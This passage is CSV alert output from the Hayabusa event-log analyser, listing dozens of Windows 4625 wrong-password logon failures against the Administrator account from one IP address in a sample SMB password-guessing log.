+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7R8yD7A0lCU16Z0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frasd7f8On0O7B6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtOqqV6rkCIZPPFG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lnwn4dc1lKABRKxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiUnLFzfXR6rER9B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1InESrL0ebaRw2z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlLAG8gXt9YNeW4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZIWubLvZcDOWHxr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZazp7ZnBrtswAse : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqK5Vqf0QF4qtg0A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3JvFwi9gDNbO6Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBubAOTZMsahNG0Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KCxrXG3N1IRzDxxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2h9M7o0lS7oC00a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pprfGGVZblL64xC3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wxgzMKd7eDwzs8WO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q2RljqAhn0NZhR6O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcxQVtjMqnE1wGfr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fSRggYsSiJGsGSyV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQqfSKOyKLSILPrQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7oAI2q6YCu8btlK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KniVwndqE9aC6cIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FgQbvpfuS11matJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R9TwJS4B9ZaDD2Ze : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPUuoopOnwlTjlTP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9VEyOUuiOi8Q3JBJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGGGazMTBBfrppDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NKO4V35Y2qPEB59W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WxVdhpR7ZnAluurU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZjAZb9bQKZjwL8u : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aKyLX5ChpgBuFEbr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49t2xJvH2yHcyHle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sg9Z6Pyix2UkMolr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0NN2olYn97ZoYCja : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S98j54bDGsz0k6g9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxFEw9s0nnEQGzUN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSswFHFSlqcQd47k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7icutlVIWSLZJszQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSwyugYn0n3i5f25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmBaLCUcR7TmixTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1oOBz2NQSCdTwa7V : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O4tU1LPF5DRW9Vm0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRsSNqPYruWBzp2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3JZhBLzt4af1VtCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dFLZIKSDBvBaWq59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: guAG4ZTFMjZAxp1A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yd04xsSIdiczICeG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cx3i1URKPhC6KWI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Npc6IS27HsWP3JA9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIBnr0eZ1bHHGokW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6gTTrUVjpPU80LlC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZlmUbCNAJga24JH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zf3aSGBMe97VujaH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bx7ZM77aDG7y6Lh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BnHHAClMwyqA3TTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00ibRrYvnFt5w9X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VglTKbnLVFvHZHzQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NwX0sDFwHQG7Tkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3mMx3M1zurKMBzyj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sH7b8P0O0uea3PlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJcrTyBPuX0TcvOT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwuZIQAL3BmJnPsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxgAfsnH6YWLRD0a : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ttBOjzmEBjr9W2QW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FPDKGGYkJQeWgtUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nSoJWqS6YPbpCiBf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pr2oMzxv7pcDfsgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jiopmZAMpwg3dEaA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG1Bxm0lt3vwoO5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Kf5AaQX7KOVAIAN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW9nBirBTHIXIrfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9qKcDhfcf2kMk00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9NgStzf2xQ4P7q0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9mCrjQykX06IcMf : IP Address: 192.168.198.149 : AuthPackage: 
